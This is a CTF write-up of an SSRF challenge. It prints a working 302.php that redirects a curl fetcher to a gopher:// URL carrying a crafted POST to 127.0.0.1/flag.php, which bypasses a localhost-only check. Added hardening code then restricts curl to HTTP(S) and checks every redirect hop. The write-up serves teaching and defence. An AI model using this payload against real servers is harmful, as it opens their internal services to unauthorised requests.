A CTF challenge with two files: ssrf3.php and flag.php.
The challenge states that flag.php may only be accessed from 127.0.0.1 and additionally checks a POST parameter, so the gopher protocol is needed to submit the POST data and bypass this.
curl is configured to follow 302 redirects, so a 302.php that performs the redirect can be hosted on your own VPS.
First, capture the POST request that accesses flag.php:
POST /flag.php HTTP/1.1
Host: 192.168.154.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

username=admin
Since there is only one machine, I changed Host directly to 127.0.0.1, then rewrote the request in the form the gopher protocol expects and put it into 302.php.
Contents of 302.php:
<?php
// Each CRLF of the captured request is encoded as %0d%0a; the blank line before the body is %0d%0a%0d%0a.
header("Location:gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1%0d%0aHost: 127.0.0.1%0d%0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0%0d%0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8%0d%0aAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%0d%0aAccept-Encoding: gzip, deflate%0d%0aConnection: keep-alive%0d%0aUpgrade-Insecure-Requests: 1%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aContent-Length: 14%0d%0a%0d%0ausername=admin");
The flow: submit http://www.myvpsip.xip.io/302.php to ssrf3.php. The vulnerable machine fetches 302.php, follows the redirect, and via the gopher protocol sends a request to its own flag.php that carries the POST data username=admin. The flag can then be seen in the page source of ssrf3.php.
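As an added example (not code from the writeup), here is what decides whether this 302-to-gopher trick works on the fetching side: a fetch that follows redirects with any protocol libcurl supports, beside a hardened version that pins curl to HTTP(S) and validates every hop. The challenge's ssrf3.php source is not shown, so fetch_vulnerable() is an assumed reconstruction, and url_is_safe() and fetch_hardened() are names chosen for this example.

```php
<?php
// Assumed reconstruction of the fetch in ssrf3.php (the real source is not shown):
// follows redirects with every protocol libcurl supports, so a 302 whose Location
// is gopher://127.0.0.1:80/_POST ... is obeyed and the raw request reaches port 80.
function fetch_vulnerable(string $url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

// Rejects any URL whose scheme is not http/https or whose host resolves to a
// private, loopback or other reserved IPv4 range (gethostbyname is IPv4 only).
function url_is_safe(string $url): bool {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) return false;
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) return false;
    $ip = gethostbyname($parts['host']); // e.g. 1.2.3.4.xip.io resolves to 1.2.3.4
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Hardened fetch: protocols pinned to HTTP(S) for the first request and for any
// redirect, and redirects followed by hand so every hop passes url_is_safe().
function fetch_hardened(string $url, int $maxHops = 3) {
    for ($hop = 0; $hop <= $maxHops; $hop++) {
        if (!url_is_safe($url)) return false;
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER  => true,
            CURLOPT_FOLLOWLOCATION  => false,
            CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_TIMEOUT         => 5,
        ]);
        $body = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
        $next = curl_getinfo($ch, CURLINFO_REDIRECT_URL);
        curl_close($ch);
        if ($code < 300 || $code >= 400 || !$next) return $body;
        // The writeup's 302 to gopher://127.0.0.1/... is refused here: wrong scheme, loopback host.
        $url = $next;
    }
    return false; // too many redirects
}
```

One gap remains: url_is_safe() resolves the name separately from curl, so a DNS answer that changes between the two lookups still gets through; pinning the validated address with CURLOPT_RESOLVE closes it.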